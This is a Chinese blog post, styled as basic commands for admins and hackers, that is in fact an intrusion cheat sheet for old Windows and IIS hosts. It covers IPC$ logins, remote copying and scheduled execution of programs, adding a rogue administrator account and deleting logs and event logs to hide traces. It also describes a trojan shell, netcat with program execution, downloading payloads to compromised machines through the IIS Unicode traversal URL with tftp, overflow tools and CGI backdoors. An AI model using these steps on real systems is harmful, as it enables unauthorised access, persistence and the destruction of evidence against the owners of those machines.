网管和黑客都应该知道的基础命令!

网管和黑客都应该知道的基础命令!网管和黑客都必须知道的命令 
常用的几条NET命令:   
 (与远程主机建立空管连接) net use http://www.cnblogs.com/lyglive/admin/file://ip/地址\ipc$ "" /use:""   
 (以管理员身份登录远程主机)net use http://www.cnblogs.com/lyglive/admin/file://ip/地址\ipc$ "密码" /use:"Administrator"
 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 http://www.cnblogs.com/lyglive/admin/file://ip/地址\admin$   
 (查看远程主机时间) net time http://www.cnblogs.com/lyglive/admin/file://ip/地址
 (定时启动某个程序) at http://www.cnblogs.com/lyglive/admin/file://ip/地址 02:18 readme.exe   
 (查看共享) net view http://www.cnblogs.com/lyglive/admin/file://ip/地址   
 (查看netbios工作组列表) nbtstat -A IP地址   
 (将远程主机C盘映射为自己的F盘) net use f: http://www.cnblogs.com/lyglive/admin/file://ip/地址\c$ ""/user:"Administrator"   
 (这两条把自己增加到管理员组): net user 用户名 密码 /add   net localgroup Administrators 用户名 /add  

 
 (断开连接) net use http://www.cnblogs.com/lyglive/admin/file://ip/地址\ipc$ /delete   
扫尾:
  del C:\winnt\system32\logfiles\*.*  
   del C:\winnt\ssytem32\config\*.evt   
    del C:\winnt\system32\dtclog\*.*   
    del C:\winnt\system32\*.log   
    del C:\winnt\system32\*.txt   
    del C:\winnt\*.txt   
    del C:\winnt\*.log   
一、netsvc.exe
  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
   netsvc /list http://www.cnblogs.com/lyglive/admin/file://ip/地址   
     netsvc schedule http://www.cnblogs.com/lyglive/admin/file://ip/地址 /query   
     netsvc http://www.cnblogs.com/lyglive/admin/file://ip/地址 schedule /start   
二、OpenTelnet.exe   远程启动主机的Telnet服务,并绑定端口到7878,例如:
  OpenTelnet http://www.cnblogs.com/lyglive/admin/file://ip/地址 用户名 密码 1 7878   
    然后就可以telnet到主机的7878端口,进入DOS方式下:   telnet IP地址 7878
三、winshell.exe   
    一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
    Path (查看winshell主程序的路径信息)   
    reBoot (重新启动机器)   
    shutDown (关闭机器)   
    Shell(执行后你就会看到可爱的“C:\>”)   
    eXit (退出本次登录会话,此命令并不终止winshell的运行)   
    CMD> http://.../srv.exe(通过http下载其他网站上的文件到运行winshell的机器上)   
四、3389登陆器,GUI方式登录远程主机的   
五、elsave.exe
  事件日志清除工具   
 elsave -s http://www.cnblogs.com/lyglive/admin/file://ip/地址 -l "application" -C   
 elsave -s http://www.cnblogs.com/lyglive/admin/file://ip/地址 -l "system" -C   
 elsave -s http://www.cnblogs.com/lyglive/admin/file://ip/地址 -l
 "security" -C   执行后成功清除应用程序日志,系统日志,安全日志   
六、hbulot.exe   
 开启win2kserver和winxp的3389服务   
 hbulot
 [/r]   使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
  想要连接到某处: nc [-options] hostname port[s] [ports] ...
  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]   
    参数:   -e prog 程序重定向,一旦连接,就执行 [危险!!]   -g
    gateway source-routing hop point[s], up to 8   -G num source-routing pointer: 4, 8, 12, ...   -h 帮助信息  

 -i secs
延时的间隔   -l 监听模式,用于入站连接   -n 指定数字的IP地址,不能用hostname   -o file 记录16进制的传输   -p

port
本地端口号   -r 任意指定本地及远程端口   -s addr 本地源地址   -u UDP模式   -v 详细输出——用两个-v可得到更详

细的内容   -w
secs timeout的时间   -z 将输入输出关掉——用于扫描时
 
八、TFTPD32.EXE
  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡

,例如:
  http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\

文件名
  然后可以直接令文件运行:   http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件

九、prihack.exe是IIS的printer远程缓冲区溢出工具。
  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,

绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE

浏览器连接。
  一、一 Xscan命令行运行参数说明:
  在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。  

   1.命令格式:
     xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]   xscan -file <主机列表文件名> <检测项目> [其他选项]  

 其中<检测项目>含义如下:   
 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表)


 -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);   -ntpass :
 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);   -cgi :
 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);   -iis :
 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);   [其他选项] 含义如下:  

  -v: 显示详细扫描进度
   -p: 跳过Ping不通的主机   
 -o: 跳过没有检测到开放端口的主机   
 -t <并发线程数量[,并发主机数量]>:
 指定最大并发线程数量和并发主机数量, 默认数量为100,10

你可能感兴趣的:(命令)